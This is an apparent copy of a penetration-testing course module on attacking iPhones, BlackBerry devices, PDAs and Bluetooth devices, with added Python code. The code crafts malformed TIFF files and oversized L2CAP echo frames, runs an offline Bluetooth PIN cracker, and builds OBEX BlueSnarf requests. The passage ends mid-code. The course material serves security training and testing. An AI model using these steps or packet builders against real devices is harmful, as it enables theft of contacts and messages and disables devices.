LPTv4 Module 37: Bluetooth and Handheld Device Penetration Testing

Document: 58 pages, 2.14 MB

ECSA/LPT

Bluetooth and Handheld Device Penetration Testing

Penetration Testing Roadmap

Start here:

• Information Gathering
• Vulnerability Analysis
• External Penetration Testing
• Firewall Penetration Testing
• Router and Switches Penetration Testing
• Internal Network Penetration Testing
• IDS Penetration Testing
• Wireless Network Penetration Testing
• Denial of Service Penetration Testing
• Password Cracking Penetration Testing
• Social Engineering Penetration Testing
• Stolen Laptop, PDAs and Cell Phones Penetration Testing
• Application Penetration Testing

(cont'd)

Penetration Testing Roadmap (cont'd)

• Log Management Penetration Testing
• File Integrity Checking
• Bluetooth and Handheld Device Penetration Testing
• Telecommunication and Broadband Communication Penetration Testing
• Email Security Penetration Testing
• Security Patches Penetration Testing

iPhone

Jailbreaking an iPhone

Jailbreaking is the process of unlocking iPhone and iPod touch devices to permit the installation of third-party applications.

Steps for iPhone Penetration Testing

1 • Try to jailbreak the iPhone
2 • Try to unlock the iPhone
3 • Try to activate the voicemail button on your unlocked iPhone
4 • Try to hack the iPhone using Metasploit
5 • Check for an access point with the same name and encryption type
6 • Check whether malformed data can be sent to the device
7 • Check whether basic memory mapping information can be extracted

Step 1: Try to Jailbreak the iPhone

Jailbreak the iPhone using jailbreaking tools such as iDemocracy, iActivator, and iFuntastic.

Jailbreaking Using iFuntastic

Download the iPhone hacking kit and install iFuntastic in your Applications folder.

After installing, perform the following steps:

• Reboot your Mac cleanly, so that iFuntastic is not crashed during this process
• Switch on your iPhone and connect it to your Mac using the appropriate cable
• Press the Prepare button on the left side of the iFuntastic window
• Click the Jailbreak button at the bottom of the window
• Follow the six steps on the next page of the window

Jailbreaking Using iFuntastic: Screenshot

Jailbreaking Using AppSnapp

• Go to http://www.jailbreakme.com on your iPhone or iPod touch to automatically jailbreak the device and put Installer.app on it
• At the bottom of the page, click the Install AppSnapp button; you will then see the "Slide to Unlock" screen
• After unlocking the device, you will find the "Installer" icon on your screen; tap "Installer", then "Sources", and install the "Community Sources" package
• Under the "System" tab, install the BSD Subsystem and OpenSSH
• Your iPhone is now ready to receive and run third-party binaries

Tool for Jailbreaking: iDemocracy

iDemocracy is an iPhone jailbreak and third-party application installation solution for the Windows platform.

It installs Installer.app (for third-party apps and games), custom ringtones, and a SIM unlock.

It has newer features such as free ringtones on current firmwares, as well as file browsing.

iDemocracy: Screenshot

Tool for Jailbreaking: iActivator

iActivator is a Cocoa-based application for the Mac.

It is a graphical interface providing iPhone activation/deactivation tools and methods for breaking and restoring the jail.

iActivator: Screenshot

Tool for Jailbreaking: iNdependence

iNdependence is a Cocoa-based application for Mac OS X which provides an easy-to-use interface for jailbreak, activation, SSH installation, and ringtone installation.

It allows unauthorized third-party application installation on your iPhone.

Step 2: Try to Unlock the iPhone

Unlock the iPhone using tools such as iPhoneSimFree and anySIM.

Tool to Unlock the iPhone: anySIM

anySIM is a GUI-based SIM unlocking solution for the iPhone.

It is for iPhones running OS v1.1.1, or iPhones that were upgraded from 1.0.2 to 1.1.1.

It is described as fully automatic, requiring only to be copied to a "jailbroken" iPhone and launched from the SpringBoard interface.

Unlocking Your iPhone Using anySIM

Jailbreak your iPhone with iActivator or iNdependence, and set it up to install third-party applications.

Use the following steps to put anySIM on it:

1. Download anySIM 1.1 and extract it.
2. Move the "anySIM" file to the Applications folder.
3. Open Terminal (located in /Applications/Utilities) and type the following:

   scp -r /Applications/anySIM.app root@IPADDRESS:/Applications/

   where IPADDRESS is the IP address of your iPhone.
4. Restart your iPhone.
5. Run the anySIM application to unlock your iPhone.

This copy works only because the jailbreak installed OpenSSH on the device with the root account enabled. A jailbroken phone that still has the well-known default root password is itself a finding worth recording: anyone on the same network can do the same copy.

Step 3: Try to Activate the Voicemail Button on Your Unlocked iPhone

• Get the voicemail number of your carrier
• Dial: *5005*86*xxx# (where xxx is your voicemail number)
• Tap Call
• Tap the Voicemail button, which automatically calls your voicemail service

Step 4: Try to Hack the iPhone Using Metasploit

Use the Metasploit framework to exploit vulnerabilities in the iPhone.

This allows the attacker to:

• Control an iPhone remotely
• Gain root access to the iPhone
• Remotely access recently modified files
• Access stored emails
• View the iPhone's web browsing history

Step 5: Check for an Access Point with the Same Name and Encryption Type

The iPhone identifies access points by SSID.

If the user comes within range of an attacker-controlled access point with the same name and encryption type as a network the phone already knows, the iPhone will automatically join the malicious access point.

The attacker then injects the exploit into the web page the browser requests, replacing it with a page containing the exploit.

Step 6: Check Whether Malformed Data Can Be Sent to the Device

• Perform this attack on an iPhone with the MobileSafari browser
• Extract the binaries from the device by jailbreaking it
• Analyze the binaries using a disassembler such as diStorm64 (the device's own binaries are ARM code, so an ARM-capable disassembler is needed for those)
• Perform the source code audit
• Send the malformed data to the device to cause a fault and make it crash

Step 7: Check Whether Basic Memory Mapping Information Can Be Extracted

Run the Mac OS X crash reporter.

It provides register values and basic memory mapping information.

BlackBerry

Vulnerabilities in BlackBerry

A boundary error exists in the attachment service while handling malformed TIFF image attachments.

Errors exist in the handling of Server Routing Protocol (SRP) packets:

• This vulnerability interrupts the communication between the BlackBerry Enterprise Server and the BlackBerry Router, resulting in a DoS.

A boundary error exists in the attachment service while handling malformed Microsoft Word (.doc) files:

• This vulnerability results in a buffer overflow, through which arbitrary code can be executed.

Steps for Penetration Testing

1: Try Blackjacking on a BlackBerry
2: Try to attack by sending malformed TIFF image files

Step 1: Try Blackjacking on a BlackBerry

Blackjacking is a method of hijacking a BlackBerry connection.

Use the BBProxy tool to conduct Blackjacking.

Install BBProxy on a user's BlackBerry. When the tool is activated, it creates a covert channel between the attacker and hosts on the unsecured enterprise network, riding on the BlackBerry's existing trusted connection to the BlackBerry Enterprise Server.

Step 2: Try to Attack by Sending Malformed TIFF Image Files

There is a heap overflow vulnerability in the BlackBerry attachment service when handling TIFF image files.

Send a malformed TIFF image file to the user's BlackBerry device.

Once the user opens the attached TIFF file, it causes a DoS. Note that the Attachment Service is a component of the BlackBerry Enterprise Server: the fault is triggered on the server when it renders the attachment for the handset, which is what makes this a DoS against the enterprise infrastructure rather than a single phone.
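The boundary errors above (malformed TIFF attachments here, and the malformed-data step in the iPhone section) come down to a parser trusting offsets and counts inside the file without checking them against the file's real size. The following is an added example written for this page, not code from the BlackBerry attachment service or from the course: it builds a minimal little-endian TIFF, produces three malformed variants (a strip count larger than the pixel buffer, a strip that runs past the end of the file, and an IFD that lies about its entry count), and shows a reader that validates every count and offset before copying, beside the unchecked copy that reproduces the overflow. The TIFF layout follows the TIFF 6.0 specification; all sample images are constructed inline.

```python
import struct

# TIFF 6.0, little-endian ("II", magic 42). Every IFD entry is
# tag(2) type(2) count(4) value-or-offset(4); values larger than 4 bytes
# live elsewhere in the file at the given offset.
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}   # BYTE, ASCII, SHORT, LONG, RATIONAL
IMAGE_WIDTH, IMAGE_LENGTH, STRIP_OFFSETS, STRIP_BYTE_COUNTS = 256, 257, 273, 279


def build_tiff(entries, pixel_data):
    """Build a one-IFD TIFF from (tag, type, count, value) entries. The
    STRIP_OFFSETS value is patched to point at pixel_data, which follows the
    IFD. Constructed sample data, not a real attachment."""
    ifd_off = 8
    data_off = ifd_off + 2 + 12 * len(entries) + 4
    ifd = struct.pack("<H", len(entries))
    for tag, typ, count, value in entries:
        if tag == STRIP_OFFSETS:
            value = data_off
        ifd += struct.pack("<HHII", tag, typ, count, value)
    ifd += struct.pack("<I", 0)                       # no next IFD
    return b"II" + struct.pack("<HI", 42, ifd_off) + ifd + pixel_data


def parse_ifd(buf):
    """Return {tag: (type, count, value_or_offset)} for the first IFD,
    refusing any entry count or out-of-line offset that does not fit in the file."""
    if buf[:4] != b"II*\x00":
        raise ValueError("not a little-endian TIFF")
    ifd_off = struct.unpack_from("<I", buf, 4)[0]
    if ifd_off + 2 > len(buf):
        raise ValueError("IFD offset outside file")
    n = struct.unpack_from("<H", buf, ifd_off)[0]
    if ifd_off + 2 + 12 * n + 4 > len(buf):
        raise ValueError(f"IFD claims {n} entries but file is {len(buf)} bytes")
    fields = {}
    for i in range(n):
        tag, typ, count, val = struct.unpack_from("<HHII", buf, ifd_off + 2 + 12 * i)
        size = TYPE_SIZES.get(typ)
        if size is None:
            raise ValueError(f"tag {tag}: unknown field type {typ}")
        if size * count > 4 and val + size * count > len(buf):
            raise ValueError(f"tag {tag}: value at {val}+{size * count} exceeds file")
        fields[tag] = (typ, count, val)
    return fields


def read_strip(buf, fields, checked=True):
    """Copy the single image strip into a pixel buffer sized from the header.
    checked=False reproduces the boundary error: it trusts StripByteCounts."""
    width, height = fields[IMAGE_WIDTH][2], fields[IMAGE_LENGTH][2]
    off, cnt = fields[STRIP_OFFSETS][2], fields[STRIP_BYTE_COUNTS][2]
    dest = bytearray(width * height)                  # 8-bit samples
    if checked:
        if off + cnt > len(buf):
            raise ValueError(f"strip {off}+{cnt} runs past end of file ({len(buf)})")
        if cnt > len(dest):
            raise ValueError(f"StripByteCounts {cnt} exceeds pixel buffer {len(dest)}")
    src = buf[off:off + cnt]
    dest[:len(src)] = src      # a bytearray silently grows; a C heap buffer is overrun
    return bytes(dest)


def check_attachment(buf, checked=True):
    """Full parse of one attachment: ('ok', bytes_written) or ('rejected', reason)."""
    try:
        return "ok", len(read_strip(buf, parse_ifd(buf), checked))
    except ValueError as e:
        return "rejected", str(e)


def sample_entries(strip_bytes):
    """4x2 8-bit greyscale image in one strip (constructed)."""
    return [
        (IMAGE_WIDTH, 4, 1, 4), (IMAGE_LENGTH, 4, 1, 2),
        (258, 3, 1, 8),                 # BitsPerSample
        (259, 3, 1, 1),                 # Compression: none
        (262, 3, 1, 1),                 # PhotometricInterpretation: BlackIsZero
        (STRIP_OFFSETS, 4, 1, 0),       # patched by build_tiff
        (278, 4, 1, 2),                 # RowsPerStrip
        (STRIP_BYTE_COUNTS, 4, 1, strip_bytes),
    ]


GOOD = build_tiff(sample_entries(8), bytes(range(8)))
OVERFLOW = build_tiff(sample_entries(64), bytes(64))    # strip larger than the pixel buffer
OOB_READ = build_tiff(sample_entries(4096), bytes(8))   # strip extends past end of file
BAD_IFD = GOOD[:8] + struct.pack("<H", 0xFFFF) + GOOD[10:]   # entry count lies

if __name__ == "__main__":
    for name, img in [("good", GOOD), ("overflow", OVERFLOW), ("oob-read", OOB_READ), ("bad-ifd", BAD_IFD)]:
        print(f"{name:9s} checked={check_attachment(img)}  unchecked={check_attachment(img, False)}")
```

The checked reader rejects each malformed file with the exact field that was inconsistent, which is the information a tester wants when deciding whether a crash observed on the real service is a simple length confusion or something exploitable. The same three mutations (oversized count, out-of-file offset, lying entry count) are the first cases to try against any attachment renderer, not only TIFF.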

Personal Digital Assistant (PDA)

• After obtaining the password, an attacker can steal private information or unleash malicious code.

Steps for Penetration Testing

1 • Check whether passwords can be cracked
2 • Try ActiveSync attacks
3 • Check whether the IR port is enabled
4 • Check whether encrypted data can be decrypted

Step 1: Check Whether Passwords Can Be Cracked

Most users store their private data without setting a password on the device.

Try different password cracking tools such as Brutus and Hydra to crack the password for the device. Note that both tools attack network login prompts, so they apply to services the PDA exposes over the network (such as ActiveSync in the next step) rather than to the local power-on password.

Step 2: Try ActiveSync Attacks

ActiveSync allows a user to attempt an unlimited number of passwords at its prompt, with no lockout.

Perform brute-force and dictionary attacks, or apply password cracking tools such as Brutus and Cain & Abel, to recover an ActiveSync password.

Step 3: Check Whether the IR Port Is Enabled

An infrared port is used to synchronize the PDA or to share information from one device to another.

Check whether the infrared port of the PDA is enabled.

If it is enabled, try to get the device to accept commands remotely, and send malicious software to access the personal information.

Step 4: Check Whether Encrypted Data Can Be Decrypted

Check whether encrypted data can be decrypted.

After getting access to the personal information on the PDA, apply cryptanalysis tools such as Crank and Jipher to reveal the encrypted information. Tools of this kind target classical and weak ciphers; properly implemented modern encryption will not yield to them, so the realistic finding is data stored under a weak or home-grown scheme.

Bluetooth

Bluetooth: Introduction

Bluetooth is a telecommunications industry specification that describes how mobile phones, computers, and personal digital assistants (PDAs) can be easily interconnected using a short-range wireless connection.

It wirelessly connects mobile phones, portable computers, stereo headsets, MP3 players, and more.

Bluetooth devices connect and communicate via short-range, ad hoc networks known as piconets.

Security within Bluetooth itself covers three major areas:

• Authentication
• Authorization
• Encryption

Different Attacks on Bluetooth Devices

BlueBug attack:

• BlueBugs are security loopholes in Bluetooth-enabled devices. Attackers exploit these loopholes to access private and confidential information from the victim's device.

BTKeylogging attack:

• A BTKeylogging attack is possible if the target keyboard has a fixed PIN code and the attacker knows its BD_ADDR (Bluetooth device address).

Blueprinting:

• Blueprinting is used for remotely accessing details about Bluetooth-enabled devices (address, services, make and model).

Short pairing code attacks:

• The pairing attack is possible if the pairing process is eavesdropped. The attacker forces the Bluetooth devices to perform the pairing process again and eavesdrops on it.

Man-in-the-middle attacks:

• The attacker gets access to the link keys and unit keys (bound to the device BD_ADDR) of the Bluetooth devices and interrupts the communication to form a new communication between both devices, posing as the other.

Steps for Penetration Testing in Bluetooth

1 • Check whether the PIN can be cracked
2 • Try to perform a Blueprinting attack
3 • Check whether you are able to extract the SDP profiles
4 • Try pairing code attacks
5 • Try man-in-the-middle attacks
6 • Try BlueJacking attacks
7 • Try BTKeylogging attacks
8 • Try Bluesmacking (the ping of death)
9 • Try BlueSnarfing attacks
10 • Try BlueBug attacks

Step 1: Check Whether the PIN Can Be Cracked

Check whether the PIN can be cracked.

Use a brute-force algorithm and online brute-force password-cracking tools such as Brutus and Hydra.

Use BTCrack to crack the Bluetooth PIN and link key. BTCrack works offline from a captured pairing exchange, so the PIN itself is recovered from the sniffed IN_RAND, LK_RAND, AU_RAND and SRES values rather than by guessing against the device; Brutus and Hydra are only useful against network login services the device exposes.

Step 2: Try to Perform a Blueprinting Attack

Try a Blueprinting attack to access details about Bluetooth-enabled devices remotely.

Apply tools such as Blueprint and BTScanner to extract the details about other Bluetooth-enabled devices.

Blueprinting gives details about:

• Bluetooth device address (BD_ADDR)
• Service description records
• Model of the device

Step 3: Check Whether You Are Able to Extract the SDP Profiles

Check whether you are able to extract the SDP (Service Discovery Protocol) profiles.

Use the sdptool and BTScanner tools to extract the SDP profiles.

The SDP profile gives details about the services offered by one Bluetooth-enabled device to other Bluetooth-enabled devices.
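Steps 2 and 3 are the same data seen twice: the SDP records are what Blueprinting fingerprints, and they are also the list of channels the later attacks (BlueJacking, BlueSnarfing, BlueBug) are aimed at. The following added example, written for this page and not taken from the Blueprint or BTScanner tools, parses the text that BlueZ's `sdptool browse` prints (a constructed sample is embedded), derives a Blueprinting-style fingerprint, and flags which advertised services form the attack surface for this module. The fingerprint formula (vendor prefix of the BD_ADDR plus a sum of RecordHandle times RFCOMM channel) is an assumption made for the example, not the Blueprint tool's exact algorithm.

```python
import re

# Constructed `sdptool browse` output for a fictitious handset; the layout
# matches what BlueZ's sdptool prints for each service record.
SAMPLE_BROWSE = """\
Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up networking
Service RecHandle: 0x10000
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 5
"""

# Service class UUIDs that matter for the attacks in this module.
ATTACK_SURFACE = {
    0x1101: "Serial Port: raw RFCOMM, often an unauthenticated AT command interface (BlueBug)",
    0x1103: "Dial-up Networking: AT command channel (BlueBug)",
    0x1105: "OBEX Object Push: accepts vCards (BlueJacking); GET on it is the BlueSnarf vector",
    0x1106: "OBEX File Transfer: browsable file store",
}

CLASS_RE = re.compile(r'"([^"]*)" \((0x[0-9a-fA-F]+)\)')


def parse_sdptool_browse(text):
    """Turn sdptool browse output into a list of
    {name, handle, classes, channel} dicts, one per service record."""
    services, cur, section = [], None, None

    def new_record(name):
        rec = {"name": name, "handle": None, "classes": [], "channel": None}
        services.append(rec)
        return rec

    for line in text.splitlines():
        s = line.strip()
        if s.startswith("Service Name:"):
            cur, section = new_record(s.split(":", 1)[1].strip()), None
        elif s.startswith("Service RecHandle:"):
            if cur is None or cur["handle"] is not None:   # record without a name
                cur, section = new_record(None), None
            cur["handle"] = int(s.split(":", 1)[1].strip(), 16)
        elif cur is None:
            continue                                        # "Browsing ..." banner
        elif s.endswith("List:"):
            section = s
        elif section == "Service Class ID List:":
            m = CLASS_RE.match(s)
            if m:
                cur["classes"].append(int(m.group(2), 16))
        elif section == "Protocol Descriptor List:" and s.startswith("Channel:"):
            cur["channel"] = int(s.split(":", 1)[1])
    return services


def blueprint(bd_addr, services):
    """Simplified Blueprinting fingerprint (an assumption for this example,
    not the Blueprint tool's exact algorithm): vendor prefix of the BD_ADDR
    plus a sum over records of RecordHandle * RFCOMM channel. Devices
    running the same firmware produce the same value."""
    oui = ":".join(bd_addr.upper().split(":")[:3])
    total = sum(s["handle"] * (s["channel"] or 0)
                for s in services if s["handle"] is not None)
    return f"{oui}@{total}"


def attack_surface(services):
    """(service name, RFCOMM channel, why it matters) for each exposed service."""
    return [(s["name"], s["channel"], ATTACK_SURFACE[c])
            for s in services for c in s["classes"] if c in ATTACK_SURFACE]


if __name__ == "__main__":
    svcs = parse_sdptool_browse(SAMPLE_BROWSE)
    print("blueprint:", blueprint("00:11:22:33:44:55", svcs))
    for name, chan, why in attack_surface(svcs):
        print(f"  channel {chan:2d}  {name}: {why}")
```

In practice the output of `sdptool browse <BD_ADDR>` is piped into the parser; the channel numbers it returns are the arguments the later steps need (the Object Push channel for the OBEX attacks, the Serial Port or DUN channel for the AT command attacks), and the fingerprint lets a tester recognise the same firmware across many devices without re-running the whole enumeration.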

Step 4: Try Pairing Code Attacks

Pairing is an important part of Bluetooth that consists of two devices associating with one another.

• Eavesdrop on the pairing process.
• Send the other device a message that you have forgotten the link key.
• The other device may discard the key and create a new pairing session, which can then be captured.

Step 5: Try a Man-in-the-Middle Attack

Try to perform the man-in-the-middle attack.

Get access to the link keys and unit keys (bound to the device BD_ADDR) of the Bluetooth devices, and interrupt the communication to form a new communication between both devices, posing as the other.

Step 6: Try a BlueJacking Attack

Modify the following security settings on your device:

1 • Right-click on the Bluetooth icon → Select Advanced Configuration → Client Applications tab
2 • Select PIM Item Transfer → Properties → Uncheck the box for Secure Connection
3 • Select the Name tab, modify the contact details, email ID and other details, and click OK
4 • Right-click on the contact and select Action → Send to Bluetooth → Other
5 • Select the Bluetooth device to which you want to send the message and click Send

Step 7: Try a BTKeylogging Attack

In a BTKeylogging attack, the attacker uses the keyboard as a keylogger by intercepting all packets sent over the air and decrypting them.

Find out the fixed PIN code and BD_ADDR of the target Bluetooth keyboard.

Use a protocol analyzer to intercept the required information (IN_RAND, LK_RAND, AU_RAND, SRES, and EN_RAND) to perform the attack.
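Step 1 (cracking the PIN with BTCrack), Step 4 (forcing a fresh pairing so that it can be captured) and this step all rest on the same fact: in legacy Bluetooth pairing, every value the link key is derived from except the PIN goes over the air in the clear, and the SRES response lets an attacker test PIN guesses offline. The following added example, written for this page and not code from BTCrack or from the course, simulates one pairing between a host and a fixed-PIN keyboard, records exactly the values a protocol analyzer would see (IN_RAND, the masked LK_RAND values, AU_RAND, SRES, EN_RAND), and recovers the PIN and link key by the search BTCrack performs. The SAFER+-based E1/E21/E22 functions of the real standard are replaced by a keyed hash, an assumption made only to keep the example short; the search structure is the one the attack uses. Addresses and PINs are constructed.

```python
import hashlib
import hmac
import itertools
import os
import time


def prf(key, *parts):
    """Stand-in for the SAFER+-based E1/E21/E22 functions of legacy Bluetooth
    pairing. Assumption for this example only: HMAC-SHA256 truncated to
    128 bits. The real primitives differ; the attack structure does not."""
    return hmac.new(key, b"".join(parts), hashlib.sha256).digest()[:16]


def e22(pin, bd_addr, in_rand):          # initialisation key K_init
    return prf(pin, bd_addr, in_rand)


def e21(lk_rand, bd_addr):               # each side's half of the combination key
    return prf(lk_rand, bd_addr)


def e1(link_key, au_rand, bd_addr):      # authentication: SRES is 32 bits
    return prf(link_key, au_rand, bd_addr)[:4]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def simulate_pairing(pin, addr_host, addr_dev, rng=os.urandom):
    """Legacy (pre-Secure-Simple-Pairing) combination-key pairing, recording
    exactly the values a protocol analyzer sees on the air. Returns the
    captured trace and the real link key (kept only to check the result)."""
    in_rand, lk_rand_host, lk_rand_dev, au_rand, en_rand = (rng(16) for _ in range(5))
    k_init = e22(pin, addr_dev, in_rand)
    trace = {
        "addr_host": addr_host, "addr_dev": addr_dev,
        "IN_RAND": in_rand,                            # sent in clear
        "LK_RAND_host": xor(lk_rand_host, k_init),     # transmitted masked with K_init
        "LK_RAND_dev": xor(lk_rand_dev, k_init),
        "AU_RAND": au_rand,                            # authentication challenge
        "EN_RAND": en_rand,                            # used later for the encryption key
    }
    k_link = xor(e21(lk_rand_host, addr_host), e21(lk_rand_dev, addr_dev))
    trace["SRES"] = e1(k_link, au_rand, addr_dev)      # the response, also in clear
    return trace, k_link


def crack_pin(trace, max_digits=4):
    """Offline search over numeric PINs, the idea behind BTCrack: re-derive
    every key from the captured values and stop when the predicted SRES
    matches the captured one. Returns (pin, link_key) or (None, None)."""
    for n in range(1, max_digits + 1):
        for digits in itertools.product("0123456789", repeat=n):
            pin = "".join(digits).encode()
            k_init = e22(pin, trace["addr_dev"], trace["IN_RAND"])
            lk_host = xor(trace["LK_RAND_host"], k_init)
            lk_dev = xor(trace["LK_RAND_dev"], k_init)
            k_link = xor(e21(lk_host, trace["addr_host"]), e21(lk_dev, trace["addr_dev"]))
            if e1(k_link, trace["AU_RAND"], trace["addr_dev"]) == trace["SRES"]:
                return pin.decode(), k_link
    return None, None


def demo(pin=b"0000"):
    """Pair a host with a fixed-PIN keyboard, capture, crack. Addresses are constructed."""
    addr_host = bytes.fromhex("00aabbccddee")
    addr_keyboard = bytes.fromhex("001122334455")
    trace, real_key = simulate_pairing(pin, addr_host, addr_keyboard)
    t0 = time.perf_counter()
    found_pin, found_key = crack_pin(trace)
    return found_pin, found_key == real_key, time.perf_counter() - t0


if __name__ == "__main__":
    found, key_ok, secs = demo(b"7391")
    print(f"recovered PIN {found} (link key correct: {key_ok}) in {secs:.2f}s")
```

Once the link key is known, the attacker can compute the encryption key from the captured EN_RAND and decrypt every later keystroke, which is the BTKeylogging result, and can also pass the authentication in Step 5. The whole 4-digit space is exhausted in well under a second even with a slow keyed hash, which is why a fixed or short PIN is a finding in itself; Secure Simple Pairing (Bluetooth 2.1 and later) does not derive the link key from the PIN and is not subject to this search, so the first check on a target is which pairing mode it negotiates.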

Step 8: Try Bluesmacking (the Ping of Death)

Create a data packet larger than the allowable size for the Bluetooth device (an L2CAP echo request, as sent by l2ping with an oversized payload) and send it to the victim's device.

A device whose stack does not check the received length against its buffer crashes or otherwise behaves as the attacker intends.
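Bluesmack is an L2CAP Echo Request whose length exceeds what the receiving stack allocated for its signalling channel. The following added example, written for this page and not taken from l2ping or any Bluetooth stack, builds the same frame l2ping sends, then models a receiver with a fixed signalling buffer in two versions: one that checks the length fields and answers an oversized request with the Command Reject the L2CAP specification prescribes, and one that trusts the lengths and is overrun. Frames are assumed already reassembled from HCI ACL fragments; the 48-byte signalling MTU is the minimum the specification requires a BR/EDR device to accept.

```python
import struct

L2CAP_CID_SIGNALING = 0x0001
COMMAND_REJECT, ECHO_REQUEST, ECHO_RESPONSE = 0x01, 0x08, 0x09
REJECT_MTU_EXCEEDED = 0x0001
SIGNALING_MTU = 48     # smallest MTU_sig a BR/EDR device must accept (L2CAP spec)


def build_echo_request(ident, payload):
    """One L2CAP basic frame carrying an Echo Request: what l2ping sends,
    and what l2ping -s <big> turns into a Bluesmack packet."""
    cmd = struct.pack("<BBH", ECHO_REQUEST, ident, len(payload)) + payload
    return struct.pack("<HH", len(cmd), L2CAP_CID_SIGNALING) + cmd


def build_command_reject(ident, reason, data=b""):
    cmd = struct.pack("<BBHH", COMMAND_REJECT, ident, 2 + len(data), reason) + data
    return struct.pack("<HH", len(cmd), L2CAP_CID_SIGNALING) + cmd


class Receiver:
    """Model of a receiving stack with a fixed signalling buffer. The frame is
    assumed already reassembled from HCI ACL fragments. checked=False mirrors
    a Bluesmack-vulnerable implementation that trusts the length fields."""

    def __init__(self, mtu=SIGNALING_MTU, checked=True):
        self.buf = bytearray(mtu)
        self.checked = checked

    def handle(self, frame):
        """Returns (status, response_frame); status is reply, reject, drop or crash."""
        if len(frame) < 4:
            return "drop", b""
        length, cid = struct.unpack_from("<HH", frame, 0)
        body = frame[4:]
        if self.checked:
            if cid != L2CAP_CID_SIGNALING or length != len(body) or len(body) < 4:
                return "drop", b""                         # inconsistent header: ignore it
            if length > len(self.buf):
                # Spec behaviour: L2CAP_COMMAND_REJECT, reason "Signaling MTU
                # exceeded", data = the MTU we actually support.
                return "reject", build_command_reject(body[1], REJECT_MTU_EXCEEDED,
                                                      struct.pack("<H", len(self.buf)))
            if struct.unpack_from("<H", body, 2)[0] != len(body) - 4:
                return "drop", b""                         # command length does not match
        if len(body) > len(self.buf):
            return "crash", b""        # a C stack would memcpy past the buffer here
        self.buf[:len(body)] = body
        code, ident, dlen = struct.unpack_from("<BBH", self.buf, 0)
        if code != ECHO_REQUEST:
            return "drop", b""
        data = bytes(self.buf[4:4 + dlen])
        cmd = struct.pack("<BBH", ECHO_RESPONSE, ident, len(data)) + data
        return "reply", struct.pack("<HH", len(cmd), L2CAP_CID_SIGNALING) + cmd


def probe(receiver, payload_sizes):
    """The l2ping -s sweep: send Echo Requests of growing size and record
    how the receiver reacts to each."""
    return [receiver.handle(build_echo_request(i + 1, b"A" * n))[0]
            for i, n in enumerate(payload_sizes)]


if __name__ == "__main__":
    sizes = [8, 44, 600]
    print("hardened  :", probe(Receiver(checked=True), sizes))
    print("vulnerable:", probe(Receiver(checked=False), sizes))
```

Against a real target the same sweep is `l2ping -s <size>` with increasing sizes: a correct stack answers the large requests with a Command Reject carrying its real MTU (or simply stops answering), while a vulnerable one stops responding to everything, reboots, or drops its connections, which is the Bluesmack result to record.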

Step 9: Try a BlueSnarfing Attack

Use the Bluesnarfer tool to perform a BlueSnarfing attack.

BlueSnarfing reveals the following information:

• User's calendar
• Contact list
• Email
• Text messages

Try a BlueSnarfing Attack: Screenshot
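BlueJacking (Step 6) and BlueSnarfing (this step) use the same service, OBEX Object Push, in opposite directions: a BlueJack is an OBEX PUT of a vCard that the phone displays, and a BlueSnarf is an OBEX GET for a named object such as telecom/pb.vcf that a flawed Object Push implementation served without authentication. The following added example, written for this page and not code from Bluesnarfer or from the course, builds both requests byte for byte, parses OBEX packets with length checks, and models the phone's Object Push service in a vulnerable and a fixed form, so the difference between the two behaviours is visible in the response codes. The phonebook and calendar objects are constructed.

```python
import struct

# OBEX opcodes / response codes (final bit set) and header identifiers.
OBEX_PUT_FINAL, OBEX_GET_FINAL = 0x82, 0x83
OBEX_OK, OBEX_BAD_REQUEST, OBEX_FORBIDDEN, OBEX_NOT_FOUND = 0xA0, 0xC0, 0xC3, 0xC4
HDR_NAME, HDR_TYPE, HDR_LENGTH, HDR_BODY, HDR_END_OF_BODY = 0x01, 0x42, 0xC3, 0x48, 0x49

# Constructed objects standing in for a victim phone's telecom store.
SAMPLE_PHONEBOOK = b"BEGIN:VCARD\r\nFN:Alice Example\r\nTEL:+15555550100\r\nEND:VCARD\r\n"
SAMPLE_CALENDAR = b"BEGIN:VCALENDAR\r\nBEGIN:VEVENT\r\nSUMMARY:Board meeting\r\nEND:VEVENT\r\nEND: VCALENDAR\r\n"


def hdr_unicode(hid, text):          # header id 0b00xxxxxx: UTF-16BE, NUL terminated
    data = text.encode("utf-16-be") + b"\x00\x00" if text else b""
    return struct.pack(">BH", hid, 3 + len(data)) + data


def hdr_bytes(hid, data):            # header id 0b01xxxxxx: byte sequence
    return struct.pack(">BH", hid, 3 + len(data)) + data


def hdr_u32(hid, value):             # header id 0b11xxxxxx: 4-byte quantity
    return struct.pack(">BI", hid, value)


def obex_packet(opcode, headers):
    body = b"".join(headers)
    return struct.pack(">BH", opcode, 3 + len(body)) + body


def bluejack_push(vcard, name="hello.vcf"):
    """OBEX PUT of a vCard: this is all a BlueJacking message is."""
    return obex_packet(OBEX_PUT_FINAL, [
        hdr_unicode(HDR_NAME, name),
        hdr_bytes(HDR_TYPE, b"text/x-vCard\x00"),
        hdr_u32(HDR_LENGTH, len(vcard)),
        hdr_bytes(HDR_END_OF_BODY, vcard),
    ])


def bluesnarf_pull(path="telecom/pb.vcf"):
    """OBEX GET by name on the Object Push channel: the BlueSnarf request."""
    return obex_packet(OBEX_GET_FINAL, [
        hdr_unicode(HDR_NAME, path),
        hdr_bytes(HDR_TYPE, b"text/x-vCard\x00"),
    ])


def parse_obex(pkt):
    """Split an OBEX request or response into (opcode, {header_id: value}),
    rejecting any length field that disagrees with the bytes present."""
    opcode, total = struct.unpack_from(">BH", pkt, 0)
    if total != len(pkt):
        raise ValueError("OBEX packet length does not match data")
    pos, headers = 3, {}
    while pos < total:
        hid = pkt[pos]
        kind = hid >> 6                  # 0 unicode, 1 byte seq, 2 one byte, 3 four bytes
        if kind in (0, 1):
            if pos + 3 > total:
                raise ValueError(f"header 0x{hid:02x}: truncated")
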